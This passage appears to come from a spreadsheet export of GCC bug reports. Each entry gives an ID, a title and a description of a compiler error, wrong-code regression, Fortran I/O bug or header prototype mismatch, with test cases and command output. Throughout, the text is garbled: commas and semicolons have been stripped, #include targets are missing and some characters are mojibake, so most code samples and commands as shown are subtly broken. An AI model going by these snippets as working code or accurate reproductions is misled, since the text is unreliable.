struct c2 : virtual c1 { }
struct c3 {
  char m[0x3fffd]
}
struct c4 : c0 c3 c2 {
    c4()
}
c4::c4() { }
class c5 : virtual c4 {}
class c6 : c4 {}
$ g++ go.cpp
/tmp/cchxBAaw.s: Assembler messages:
/tmp/cchxBAaw.s:631: Error: symbol `_ZTh262140_N2c4D1Ev' is already defined
/tmp/cchxBAaw.s:650: Error: symbol `_ZTh262140_N2c4D1Ev' is already defined
/tmp/cchxBAaw.s:721: Error: symbol `_ZTh262140_N2c4D0Ev' is already defined
/tmp/cchxBAaw.s:740: Error: symbol `_ZTh262140_N2c4D0Ev' is already defined</t>
  </si>
  <si>
    <t>GCC-27558</t>
  </si>
  <si>
    <t>[4.0 Regression] Wrong type in warning</t>
  </si>
  <si>
    <t>Compiling this code:
#include 
void f(char* line) {
    char test_char[40]
    sscanf(line %s 
}
gives the following warning:
warning: format '%s' expects type 'char *' but argument 3 has type 'char (*)[39u]'
I'd have though that &amp;test_char had type char (*)[40].</t>
  </si>
  <si>
    <t>GCC-8613</t>
  </si>
  <si>
    <t>[3.2/3.3/3.4 regression] -O2 optimization generates wrong code</t>
  </si>
  <si>
    <t>In the provided code 
*dpb++ = strlen(userName)
dpb is incorrectly incremented by two bytes not one.
The output buffer should result in:
1 35 6 'sysdba'.
Instead it results in:
1 35 6 x 'sysdba'
where x is random.
Tracing in gdb shows that dpb is incremented by a value of two.
Release:
gcc 3.2
Environment:
mandrake linux 9.0
How-To-Repeat:
g++ -O2 -march=i686 -fPIC test1.cpp
./a.out 1</t>
  </si>
  <si>
    <t>mark.odonohue</t>
  </si>
  <si>
    <t>GCC-12884</t>
  </si>
  <si>
    <t>[4.0 only] error in reading a namelist when it is predeced by a line with a SLASH</t>
  </si>
  <si>
    <t>in the follwing flow of data ($FILE is not a namelist)
 $FILE
   pseu  dir/file
 $END
 $CNTRL ispher=1nosym=0runflg=0noprop=0 $END
the namelist $CNTRL is not read
 integer isphernosymrunflgnoprop
 ispher = 0
 nosym = 0
 runflg = 0
 noprop = 0 
 read(5cntrl) 
 * gives a value of 0 instead of 1 for ispher
 * putting $CNTRL before the group data $FILE gives the correct result
   as well as inserting any line between the $END of $FILE and $CNTRL)
I guess that the / in dir/file is the reason of the problem.
I can provide you with a sample program and data reproducing the bug.</t>
  </si>
  <si>
    <t>jean-pierre.flament</t>
  </si>
  <si>
    <t>GCC-14999</t>
  </si>
  <si>
    <t>[4.0 Regression] Build failure in stage2: unused parameter 'fndecl'</t>
  </si>
  <si>
    <t>Latest CVS:
alpha1:PD&gt;uname -a
Linux alpha1 2.4.9-40 #1 Mon Sep 23 08:14:02 EDT 2002 alpha unknown
alpha1:gcc-obj&gt;g++ -v
Reading specs from /usr/local/lib/gcc/alphaev56-unknown-linux-gnu/3.5.0/specs
Configured with: ../gcc/configure --verbose --enable-languages=c++
Thread model: posix
gcc version 3.5.0 20040207 (experimental)
stage1/xgcc -Bstage1/ -B/usr/local/alphaev56-unknown-linux-gnu/bin/ -c   -O
-DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes
-pedantic -Wno-long-long -Wno-variadic-macros -Wold-style-definition -Werror
-fno-common   -DHAVE_CONFIG_H    -I. -I. -I../../gcc/gcc -I../../gcc/gcc/.
-I../../gcc/gcc/../include  ../../gcc/gcc/builtins.c -o builtins.o
../../gcc/gcc/builtins.c: In function `fold_builtin_cabs':
../../gcc/gcc/builtins.c:5947: warning: unused parameter 'fndecl'
gmake[2]: *** [builtins.o] Error 1
gmake[2]: Leaving directory `/usr/home/mckelvey/software/gcc-obj/gcc'
gmake[1]: *** [stage2_build] Error 2
gmake[1]: Leaving directory `/usr/home/mckelvey/software/gcc-obj/gcc'
gmake: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-57285</t>
  </si>
  <si>
    <t>[OOP] ICE on invalid: gfc_array_dimen_size(): Bad dimension due to SIZE intrinsic with invalid dim on CLASS dummy</t>
  </si>
  <si>
    <t>The following invalid code produces an internal error. It is invalid as it uses size() with a dim argument of 2 that is larger than the number of dimensions of the referred array.
&gt; cat minimal.f90
module testmod
  type type_t
    integer :: dummy
  end type type_t
  contains
  subroutine foo(a)
    class(type_t) intent(in) :: a(:)
    type(type_t) :: c(size(adim=2))
  end subroutine
end module testmod
&gt; 
&gt; ~/sys/bin/gfortran minimal.f90 
minimal.f90:10.18:
end module testmod
                  1
Internal Error at (1):
gfc_array_dimen_size(): Bad dimension
&gt;
&gt; ~/sys/bin/gfortran --version
GNU Fortran (GCC) 4.9.0 20130514 (experimental)
Copyright (C) 2013 Free Software Foundation Inc.
GNU Fortran comes with NO WARRANTY to the extent permitted by law.
You may redistribute copies of GNU Fortran
under the terms of the GNU General Public License.
For more information about these matters see the file named COPYING
Here ~/sys/bin/gfortran is a self-compiled gfortran from yesterday's trunk the ICE also happens with the gfortran 4.7.2 supplied with openSUSE:
&gt; gfortran --version
GNU Fortran (SUSE Linux) 4.7.2 20130108 [gcc-4_7-branch revision 195012]
Copyright (C) 2012 Free Software Foundation Inc.
GNU Fortran comes with NO WARRANTY to the extent permitted by law.
You may redistribute copies of GNU Fortran
under the terms of the GNU General Public License.
For more information about these matters see the file named COPYING
&gt; gfortran minimal.f90 
minimal.f90:10.18:
end module testmod
                  1
Internal Error at (1):
gfc_array_dimen_size(): Bad dimension
This might be related to Bug #57284.</t>
  </si>
  <si>
    <t>GCC-42354</t>
  </si>
  <si>
    <t>Invalidly accepts C_LOC in init expressions</t>
  </si>
  <si>
    <t>gfortran currently treats C_LOC as suitable for initialization expressions however it does not seem to be valid in either Fortran 2003 nor Fortran 2008. 
use iso_c_binding
implicit none
integer target :: a
type t
  type(c_ptr) :: ptr = c_loc(a)
end type t
type(c_ptr) :: ptr2 = c_loc(a)
end
F2003 has:
7.1.7 Initialization expression
It is an expression in which each operation is intrinsic and each primary is
[...] (8) A specification inquiry [...]
Similarly in F2008's 7.1.12 Constant expression.
The definition for specification inquiry is in Fortran 2008 (7.1.11 Specification expression):
A specication inquiry is a reference to
(1) an intrinsic inquiry function
[...]
(4) the function C_SIZEOF from the intrinsic module ISO C BINDING (15.2.3.7)
Fortran 2003 is even more restrictive (cf. 7.1.6 Specification expression) which rules out that C_LOC can be used.
In principle I would claim that C_LOC matches (1) an intrinsic inquiry function however as (3) (4) and (5) explicitly list suitable functions from the modules I think one has to rule that it is also invalid in F2008 and not only in F2003.</t>
  </si>
  <si>
    <t>GCC-83009</t>
  </si>
  <si>
    <t>gcc.target/aarch64/store_v2vec_lanes.c fails with -mabi=ilp32</t>
  </si>
  <si>
    <t>Hi
As reported in https://gcc.gnu.org/ml/gcc-patches/2017-11/msg01213.html 
the new gcc.target/aarch64/store_v2vec_lanes.c fails when using -abi=ilp32.
Kyrill said:
My patch does indeed fail to generate the optimised sequence for -mabi=ilp32.
During combine it fails to match:
Failed to match this instruction:
(set (mem:V2DF (plus:DI (reg/v/f:DI 79 [ z ])
            (const_int 32 [0x20])) [1 MEM[(v2df *)z_8(D) + 32B]+0 S16 A128])
    (vec_concat:V2DF (reg:DF 81 [ y0 ])
        (reg:DF 84 [ y1 ])))
but without the -mabi=ilp32 it does successfully match the equivalent
(set (mem:V2DF (plus:DI (reg:DI 1 x1 [ z ])
            (const_int 32 [0x20])) [1 MEM[(v2df *)z_8(D) + 32B]+0 S16 A128])
    (vec_concat:V2DF (reg:DF 81 [ y0 ])
        (reg:DF 84 [ y1 ])))
The only difference is the index register being the hard reg x1.
There's probably some subtlety in aarch64_classify_address that I'll need to dig into.</t>
  </si>
  <si>
    <t>GCC-27321</t>
  </si>
  <si>
    <t>Compare against constant infinity fails with IBM long double format</t>
  </si>
  <si>
    <t>Test code:
    long double x = __builtin_infl()
    int main() {
	int r = x == __builtin_infl()
	return r ? 0 : 1
    }
Commands to reproduce:
    gcc -mlong-double-128 tc.c
    ./a.out &amp;&amp; echo ok || echo fail
No problem with -mlong-double-64.
Cause:
GCC first transforms (x == infinity) to (x &gt; long_double_max_val).
The maximum value returned by real_maxval is encoded as infinity due
to rounding in encode_ibm_extended.  This does not happen with the
LDBL_MAX declared in system headers because one of the bits is
cleared.
Potential fix:
--- real.c.orig 2005-09-19 12:56:24.000000000 -0400
+++ real.c      2006-04-25 21:18:32.000000000 -0400
@@ -22056 +22058 @@ real_maxval (REAL_VALUE_TYPE *r int sig
   np2 = SIGNIFICAND_BITS - fmt-&gt;p * fmt-&gt;log2_b
   memset (r-&gt;sig -1 SIGSZ * sizeof (unsigned long))
   clear_significand_below (r np2)
+  if (REAL_MODE_FORMAT_COMPOSITE_P (mode))
+      clear_significand_bit (r SIGNIFICAND_BITS - fmt-&gt;pnan - 1)
 }</t>
  </si>
  <si>
    <t>dvdfrdmn</t>
  </si>
  <si>
    <t>GCC-35208</t>
  </si>
  <si>
    <t>Please apply the patch in comment #19 of PR35035</t>
  </si>
  <si>
    <t>Would it be possible to apply the patch in comment #19 of PR35035 before releasing gcc 4.3.0?
Without this patch the libjava test hangs and needs to reboot the computer if the window in which the test has been launched is out of focus (for instance due to the screensave).</t>
  </si>
  <si>
    <t>GCC-13272</t>
  </si>
  <si>
    <t>libiberty/lbasename.c has incorrect DIR_SEPARATOR</t>
  </si>
  <si>
    <t>The DIR_SEPARATOR_2 should be defined for __CYGWIN__.
$ cvs diff -u lbasename.c
Index: lbasename.c
===================================================================
RCS file: /product/tools/gdb/libiberty/lbasename.cv
retrieving revision 1.2
diff -u -r1.2 lbasename.c
--- lbasename.c 6 Sep 2002 20:21:02 -0000       1.2
+++ lbasename.c 2 Dec 2003 17:10:58 -0000
@@ -467 +467 @@
 #endif
 #if defined (_WIN32) || defined (__MSDOS__) \
-    || defined (__DJGPP__) || defined (__OS2__)
+    || defined (__DJGPP__) || defined (__OS2__) || defined (__CYGWIN__)
 #  define HAVE_DOS_BASED_FILE_SYSTEM
 #  ifndef DIR_SEPARATOR_2
 #    define DIR_SEPARATOR_2 '\\'</t>
  </si>
  <si>
    <t>kewarken</t>
  </si>
  <si>
    <t>GCC-36392</t>
  </si>
  <si>
    <t>gcc doesn't warn if a static recursive function is unused</t>
  </si>
  <si>
    <t>Take the following example:
  static 
  int a (void)
  {
	return a()
  }
  int 
  main ()
  {
	return 0
  }
GCC doesn't warn that a() is an unused function.
This is problematic if you remove all calls to a() from your code. Although a() uses itself GCC should warn that no other function is using it so that the user could remove it.</t>
  </si>
  <si>
    <t>csaavedra</t>
  </si>
  <si>
    <t>GCC-81906</t>
  </si>
  <si>
    <t>[7 Regression] Calls to rint() wrongly optimized away starting in g++ 6</t>
  </si>
  <si>
    <t>Here is a test case:
---------------------------------- &gt;8 --------------------------------------
#include 
#include 
#include 
int main()
{
    printf(--- Test built with gcc %d.%d.%d ---\n
           __GNUC__ __GNUC_MINOR__ __GNUC_PATCHLEVEL__ )
    auto const x = -2.5
    printf(Default round mode : rint(%g)=%g\n x std::rint(x))
    fesetround(FE_DOWNWARD)
    printf(Downward round mode: rint(%g)=%g\n x std::rint(x))
    return 0
}
---------------------------------- &gt;8 --------------------------------------
% g++-7 -O1 -Wall -std=c++11 rint.cpp &amp;&amp; ./a.out
--- Test built with gcc 7.1.0 ---
Default round mode : rint(-2.5)=-2
Downward round mode: rint(-2.5)=-2
Replacing -O1 with -O0 yields the expected -3 in the last line but with -O1 (and -O2 etc) the second call to rint() is completely eliminated as can be seen by examining the generated assembly.
The same bug is also present in 6.4.0 but not in 5.4.1 nor previous versions so it looks like rint() has somehow become marked as pure in gcc 6.</t>
  </si>
  <si>
    <t>vz-gcc</t>
  </si>
  <si>
    <t>GCC-8289</t>
  </si>
  <si>
    <t>Errorneous prototypes of xmmintrin.h functions</t>
  </si>
  <si>
    <t>The following functions have different prototypes in gcc and intel headers:
First intel second gcc:
_mm_cvtps_pd:
__m128d _mm_cvtps_pd(__m128)
__m128d _mm_cvtps_pd(__m128d)
_mm_cvtss_sd:
__m128d _mm_cvtss_sd(__m128d __m128)
__m128d _mm_cvtss_sd(__m128d  __m128d)
_mm_sqrt_sd:
__m128d _mm_sqrt_sd(__m128d __m128d)
__m128d _mm_sqrt_sd(__m128d)
_mm_cvtpd_epi32:
__m128i _mm_cvtpd_epi32(__m128d)
__m128d _mm_cvtpd_epi32(__m128d)
_mm_cvtps_epi32:
__m128i _mm_cvtps_epi32(__m128)
__m128d _mm_cvtps_epi32(__m128d)
_mm_cvttpd_epi32:
__m128i _mm_cvttpd_epi32(__m128d)
__m128d _mm_cvttpd_epi32(__m128d)
_mm_cvttps_epi32:
__m128i _mm_cvttps_epi32(__m128)
__m128d _mm_cvttps_epi32(__m128d)
_mm_cvtepi32_ps:
__m128 _mm_cvtepi32_ps(__m128i)
__m128d _mm_cvtepi32_ps(__m128i)
_mm_cvtpd_ps:
__m128 _mm_cvtpd_ps(__m128d)
__m128d _mm_cvtpd_ps(__m128d)
_mm_cvtsd_ss:
__m128 _mm_cvtsd_ss(__m128 __m128d)
__m128d _mm_cvtsd_ss(__m128d  __m128d)
_mm_storeh_pd:
void _mm_storeh_pd(double * __m128d)
void _mm_storeh_pd(__m128d * double)
_mm_storel_pd:
void _mm_storel_pd(double * __m128d)
void _mm_storel_pd(__m128d * double)
_mm_stream_pd:
void _mm_stream_pd(double * __m128d)
void _mm_stream_pd(__m128d * __m128d)
Differing only in const attribute:
_mm_load1_pd:
__m128d _mm_load1_pd(double const*)
__m128d _mm_load1_pd(double *)
_mm_loadh_pd:
__m128d _mm_loadh_pd(__m128d double const*)
__m128d _mm_loadh_pd(__m128d  double *)
_mm_loadl_pd:
__m128d _mm_loadl_pd(__m128d double const*)
__m128d _mm_loadl_pd(__m128d  double *)
_mm_load_pd:
__m128d _mm_load_pd(double const*)
__m128d _mm_load_pd(double *)
_mm_loadr_pd:
__m128d _mm_loadr_pd(double const*)
__m128d _mm_loadr_pd(double *)
_mm_load_sd:
__m128d _mm_load_sd(double const*)
__m128d _mm_load_sd(double *)
_mm_loadu_pd:
__m128d _mm_loadu_pd(double const*)
__m128d _mm_loadu_pd(double *)
_mm_loadh_pi:
__m128 _mm_loadh_pi(__m128 __m64 const*)
__m128 _mm_loadh_pi(__m128  __m64 *)
_mm_loadl_pi:
__m128 _mm_loadl_pi(__m128 __m64 const*)
__m128 _mm_loadl_pi(__m128  __m64 *)
_mm_load_ps1:
__m128 _mm_load_ps1(float const*a)
__m128 _mm_load_ps1(float *)
_mm_load_ps:
__m128 _mm_load_ps(float const*a)
__m128 _mm_load_ps(float *)
_mm_loadr_ps:
__m128 _mm_loadr_ps(float const*a)
__m128 _mm_loadr_ps(float *)
_mm_load_ss:
__m128 _mm_load_ss(float const*a)
__m128 _mm_load_ss(float *)
_mm_loadu_ps:
__m128 _mm_loadu_ps(float const*a)
__m128 _mm_loadu_ps(float *)
_mm_clflush:
void _mm_clflush(void const*)
void _mm_clflush(void *)
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-5057</t>
  </si>
  <si>
    <t xml:space="preserve">gcj -C erroneously omits </t>
  </si>
  <si>
    <t>Compile this class with `gcj -C':
    public class t {
      public static int x
      static {
	      x = 72
      }
      public static void main (String[] args)
      {
	System.out.println (x)
      }
    }
Now run `jcf-dump -c' on the output.
Note that there is no  method.
This example works fine when I compile to native.
Release:
current cvs trunk</t>
  </si>
  <si>
    <t>GCC-7172</t>
  </si>
  <si>
    <t>fstream object cannot be read from a second file after first file is closed</t>
  </si>
  <si>
    <t>The code reads the no. of bytes in the first file.the file object is closed and then associated with a second file. the second file is opened but the first byte is recognized as a EOF which is false.The output of second statement is 0 which is the wrong answer.This code works well on sparc solaris with gcc version egcs-2.91.60.
Release:
gcc version 3.1
Environment:
Debian GNU/LinuxPC
How-To-Repeat:
create 2 test files:
File1 : tst1
hello world
File2: tst2
bye world
run the compiled code in the directory with the two text files 'tst1' and 'tst2'.the first file's byte count is returned but not the second.</t>
  </si>
  <si>
    <t>csarat</t>
  </si>
  <si>
    <t>GCC-15805</t>
  </si>
  <si>
    <t>Illegal program not detected allows writing through access to constant</t>
  </si>
  <si>
    <t>(Debian bug #246387)
with text_io
procedure Test_246387 is
   c: aliased constant integer := 3
   type const_ptr is access constant integer
   cp : const_ptr := c'access
   procedure inc(var_ptr: access integer := cp) is
   begin
      var_ptr.all := var_ptr.all + 1
   end inc
begin
   text_io.put_line(integer'image(cp.all))
   inc
   text_io.put_line(integer'image(cp.all))
end Test_246387
I expect:
test_246387.adb:9:44: incompatible types expected access integer received
const_ptr
But I get nothing.</t>
  </si>
  <si>
    <t>GCC-51519</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: in inline_small_functions at ipa-inline.c:1410 with -O -fno-guess-branch-probability -findirect-inlining</t>
  </si>
  <si>
    <t>Created attachment 26064
reduced testcase (from gcc.dg/pr44012.c)
Compiler output:
$ gcc -O -fno-guess-branch-probability -findirect-inlining testcase.c
testcase.c:36:1: internal compiler error: in inline_small_functions at ipa-inline.c:1410
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) list
1405
1406          /* When updating the edge costs we only decrease badness in the keys.
1407             Increases of badness are handled lazilly when we see key with out
1408             of date value on it we re-insert it now.  */
1409          current_badness = edge_badness (edge false)
1410          gcc_assert (cached_badness == current_badness)
1411          gcc_assert (current_badness &gt;= badness)
1412          if (current_badness != badness)
1413            {
1414              edge-&gt;aux = fibheap_insert (heap current_badness edge)
(gdb) bt
#0  fancy_abort (file=0x147bef0 /mnt/svn/gcc-trunk/gcc/ipa-inline.c line=1410 function=0x147c660 inline_small_functions)
    at /mnt/svn/gcc-trunk/gcc/diagnostic.c:898
#1  0x0000000001136bb2 in inline_small_functions () at /mnt/svn/gcc-trunk/gcc/ipa-inline.c:1410
#2  ipa_inline () at /mnt/svn/gcc-trunk/gcc/ipa-inline.c:1708
#3  0x00000000008f8ac5 in execute_one_pass (pass=0x17c42e0) at /mnt/svn/gcc-trunk/gcc/passes.c:2079
#4  0x00000000008f928a in execute_ipa_pass_list (pass=0x17c42e0) at /mnt/svn/gcc-trunk/gcc/passes.c:2446
#5  0x00000000006af920 in ipa_passes () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2075
#6  cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2146
#7  0x00000000006afd5a in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1327
#8  0x000000000058d620 in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:10026
#9  0x00000000009edc94 in compile_file (argc=15 argv=0x7fffffffdab8) at /mnt/svn/gcc-trunk/gcc/toplev.c:573
#10 do_compile (argc=15 argv=0x7fffffffdab8) at /mnt/svn/gcc-trunk/gcc/toplev.c:1928
#11 toplev_main (argc=15 argv=0x7fffffffdab8) at /mnt/svn/gcc-trunk/gcc/toplev.c:2004
#12 0x00007ffff61570ed in __libc_start_main () from /lib64/libc.so.6
#13 0x0000000000570df1 in _start ()
Tested revisions:
r182218 - crash
r181710 - crash
r180540 - OK
r178498 - OK
4.6 r180325 - OK</t>
  </si>
  <si>
    <t>GCC-45597</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in gfc_trans_cycle at fortran/trans-stmt.c:4320</t>
  </si>
  <si>
    <t>&gt; gfortran -c -fopenmp bug.f90
bug.f90: In function â€˜rs_pw_transfer_distributedâ€™:
bug.f90:6:0: internal compiler error: in gfc_trans_cycle at fortran/trans-stmt.c:4320
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
&gt; cat bug.f90
  SUBROUTINE rs_pw_transfer_distributed()
    INTEGER ALLOCATABLE DIMENSION(: :)    :: bounds
!$omp parallel do default(none) &amp;
!$omp             shared(boundsmy_rs_rank)
       DO i = 0 N
          IF (ub_send(1) .LT.bounds(my_rs_rank1)) CYCLE
       END DO
  END SUBROUTINE rs_pw_transfer_distributed</t>
  </si>
  <si>
    <t>GCC-39845</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE: in make_decl_rtl at varasm.c:1304</t>
  </si>
  <si>
    <t>With revision 146515 this test passed.
From revision 146517 and on this test has failed as follows:
Running /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.c-torture/compile/compile.exp ...
FAIL: gcc.c-torture/compile/981006-1.c  -O2  (internal compiler error)
FAIL: gcc.c-torture/compile/981006-1.c  -O2  (test for excess errors)
FAIL: gcc.c-torture/compile/981006-1.c  -O3 -fomit-frame-pointer  (internal compiler error)
FAIL: gcc.c-torture/compile/981006-1.c  -O3 -fomit-frame-pointer  (test for excess errors)
FAIL: gcc.c-torture/compile/981006-1.c  -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/compile/981006-1.c  -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/compile/981006-1.c  -Os  (internal compiler error)
FAIL: gcc.c-torture/compile/981006-1.c  -Os  (test for excess errors)
With the message in the logfile being (beware cutnpaste):
Executing on host: /tmp/hpautotest-gcc1/cris-elf/gccobj/gcc/xgcc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/gcc/   -O2  -w -Wuninitialized -Werror -c   -isystem /tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/./newlib/targ-include -isystem /tmp/hpautotest-gcc1/gcc/newlib/libc/include  -o 981006-1.o /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.c-torture/compile/981006-1.c    (timeout = 300)
/tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.c-torture/compile/981006-1.c: In function 'main':^M
/tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.c-torture/compile/981006-1.c:50: internal compiler error: in make_decl_rtl at varasm.c:1304^M
Please submit a full bug report
Author of the patch causing or exposing the regression CC:ed.</t>
  </si>
  <si>
    <t>GCC-6117</t>
  </si>
  <si>
    <t xml:space="preserve"> Thank you for the additional information you have supplied regarding
 this problem report.  It has NOT been forwarded to the developers but
 will accompany the original report in the Bug tracking system.  Please
 ensure that you yourself have sent a copy of the additional
 information to any relevant developers or mailing lists.
 If you wish to continue to submit further information on your problem
 please send it to 108036-quiet@bugs.debian.org as before.
 Please do not reply to the address at the top of this message
 unless you wish to report a problem with the Bug-tracking system.
 Debian bug tracking system administrator
 (administrator Debian Bugs database)
Release:
unknown
Unformatted:
          (was pending/6114: Bug#108036: Info received and FILED only)</t>
  </si>
  <si>
    <t>GCC-2310</t>
  </si>
  <si>
    <t>Fails to converter char* to signed char* even with -fsigned-char</t>
  </si>
  <si>
    <t>While trying to build mozilla I get the following error:
    nsRenderingContextGTK.cpp: In member function
    `void nsRenderingContextGTK::UpdateGC()':
    nsRenderingContextGTK.cpp:538: cannot
    convert `char*' to `signed char*' for argument `3' to `void 
    gdk_gc_set_dashes(GdkGC* int signed char* int)'
This code builds with 2.95.2 and egcs-2.91.66.  I tried adding -fsigned-char
and that did not help.  Neither did -fpermissive.
Release:
3.0 20010316 (prerelease)
Environment:
System: Linux bessie 2.4.2 #15 Thu Feb 22 10:02:40 EST 2001 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local/home/jlnance/gcctemp --enable-languages=cc++ : (reconfigured)
How-To-Repeat:
g++ -o /dev/null -c -fsigned-char nsRenderingContextGTK.ii</t>
  </si>
  <si>
    <t>GCC-42665</t>
  </si>
  <si>
    <t>Internal compiler exception in with gfortran when using  -fwhole-program -flto -fopenmp</t>
  </si>
  <si>
    <t>When using -fwhole-program -flto -fopenmp on a program with gcc-4.5-20100107 I get an internal compiler exception.  If I remove the -fopenmp the program compiles fine.  If I remove the -flto -fwhole-program the program compiles fine.
I have only been able to trigger this in a multi-thousand line program proprietary program and have not yet figured out a small test case that causes this.  If you have any hints as to how to create a small test case I will try them.  I cannot provide the full program source code.  
Approximate command line:
gfortran -march=native -std=f95 -g -Wall -pedantic -O3 -Wline-truncation -fopenmp -fbounds-check -fwhole-program -flto -o program lots.o of.o dot.o files.o
Error:
lto1: internal compiler error: in iterative_hash_expr at tree.c:6592
Relevant portion of gcc/tree.c:
      /* FALL THROUGH */
    default:
      tclass = TREE_CODE_CLASS (code)
      if (tclass == tcc_declaration)
	{
	  /* DECL's have a unique ID */
	  val = iterative_hash_host_wide_int (DECL_UID (t) val)
	}
      else
	{
	  gcc_assert (IS_EXPR_CODE_CLASS (tclass))
	  val = iterative_hash_object (code val)
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/jjc/gcc/gcc45/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.5-20100107/configure --prefix=/home/jjc/gcc/gcc45 --enable-languages=cc++fortranltoobjc --disable-multilib
Thread model: posix
gcc version 4.5.0 20100107 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-24527</t>
  </si>
  <si>
    <t>derived types not displayed correctly with gdb</t>
  </si>
  <si>
    <t>This may be a gdb bug but anyway...
 cat type.f90
program main
  type foo
    real :: a
    integer :: b
  end type foo
  type(foo) :: q
  q = foo(3.14 42)
  print *q
end program main
$ gfortran -g type.f90
$ gdb ./a.out
GNU gdb 6.3-debian
Copyright 2004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386-linux...Using host libthread_db library /lib/tls/libthread_db.so.1.
(gdb) b type.f90:7
Breakpoint 1 at 0x8048624: file type.f90 line 7.
(gdb) r
Starting program: /home/ig25/Krempel/Gdb/a.out
Breakpoint 1 MAIN__ () at type.f90:7
7         q = foo(3.14 42)
Current language:  auto currently fortran
(gdb) p q
$1 = Invalid F77 type code 3 in symbol table.
(gdb) q
The program is running.  Exit anyway? (y or n) y</t>
  </si>
  <si>
    <t>GCC-957</t>
  </si>
  <si>
    <t>List directed input with underfilled array read incorrectly</t>
  </si>
  <si>
    <t>The following aborts while it should end normally:
      LOGICAL TF(5)
      CHARACTER*60 LINE
      NAMELIST /LIST/ TFTTFFXYZ
      DATA TF /5*.FALSE./
      DATA LINE /'&amp;LISTTF=.T..F..T.FF=33.TT=23.XYZ=-1234.55/'/
      OPEN(1STATUS='SCRATCH')
      WRITE(1*) LINE
      REWIND(1)
      READ(1LIST)
      CLOSE(1)
      IF (TF(5)) CALL ABORT
      END
Release:
g77-2.95.x current snapshots
Environment:
i?86-linux alpha-linux
How-To-Repeat:
g77 g77.f-torture/execute/20001201.f</t>
  </si>
  <si>
    <t>GCC-9777</t>
  </si>
  <si>
    <t>ICE in pop_binding: Name clash between a class and a method triggers ice.</t>
  </si>
  <si>
    <t>When compiling the following code I get an error message
test.cc:18: Internal compiler error in pop_binding at cp/decl.c:1178
The problem arises because a method-identifier 
unigeneCluster::locusLink collides with a class-identifier
locusLink. All this seems to happen only when sub-classing
is involved as in the present case. 
I guess the code is legal but I am a physicist not a compiler guru..
#include 
using std::string
class annotationDB {
 public:
  class locusLink {  }
  class unigeneCluster {
  public:
    virtual const string 
  }
}
class inMemDB : public annotationDB {
public:
  class unigeneCluster : public annotationDB::unigeneCluster { }
  class locusLink : public annotationDB::locusLink { }
}
Release:
3.2.2
Environment:
Configured with: ../gcc-3.2.2/configure --with-cpu=pentium4 --prefix=/usr/local Thread model: posix gcc version 3.2.2
i386-Redhat7.3-linux
How-To-Repeat:
Compile the code</t>
  </si>
  <si>
    <t>bilkes</t>
  </si>
  <si>
    <t>GCC-28014</t>
  </si>
  <si>
    <t>space-optimized divide used inconsistently</t>
  </si>
  <si>
    <t>sh-elf has space optimized division functions for -m4 / -m4-single which are provided in a separate library which is used when statically linking with -Os .
However libgcc itself constains some references to the divide functions.  If
these functions have not been used by something else earlier the references
are satisifed from within libgcc.
This is a missed space optimization but worse libgcc.a has a module which defines both signed and unsigned divide while libgcc-Os-4-200.a provides
them in two separate modules.
If one of the symbols is pulled in early from libgcc-Os-4-200.a and the other
satisfied later from within libgcc.a the first symbol ends up being defined twice.
I propose to fix this by putting a copy of the unwinder code into libgcc-Os-4-200.a which will make the only reference to signed divide
from libgcc.a irrelevant and by providing an sh udiv_qrnnd definition in longlong.h and optimizing 1U/0 away in sh.md which will get rid of the references to unsigned divide in libgcc.a</t>
  </si>
  <si>
    <t>GCC-48822</t>
  </si>
  <si>
    <t>[4.5 Regression] G++ gets stucks and never finishes compilation when enabling -O2/3 optimization options.</t>
  </si>
  <si>
    <t>Trying to compile the example below with g++ -O3 or -O2 it gets stuck in an endless loop.
Error seems to occur in optimizing the (a == CFraction(00))
It only occurs when it is CFraction(00).  It seems to break in the '==' implementation  on the lowestTerm() (line 69) on the CFraction(00)
running on a 64bit machine. (ubuntu natty)
gcc -v:
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.5.2/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.5.2-8ubuntu4' --with-bugurl=file:///usr/share/doc/gcc-4.5/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.5 --enable-shared --enable-multiarch --with-multiarch-defaults=x86_64-linux-gnu --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib/x86_64-linux-gnu --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.5 --libdir=/usr/lib/x86_64-linux-gnu --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-gold --enable-ld=default --with-plugin-ld=ld.gold --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
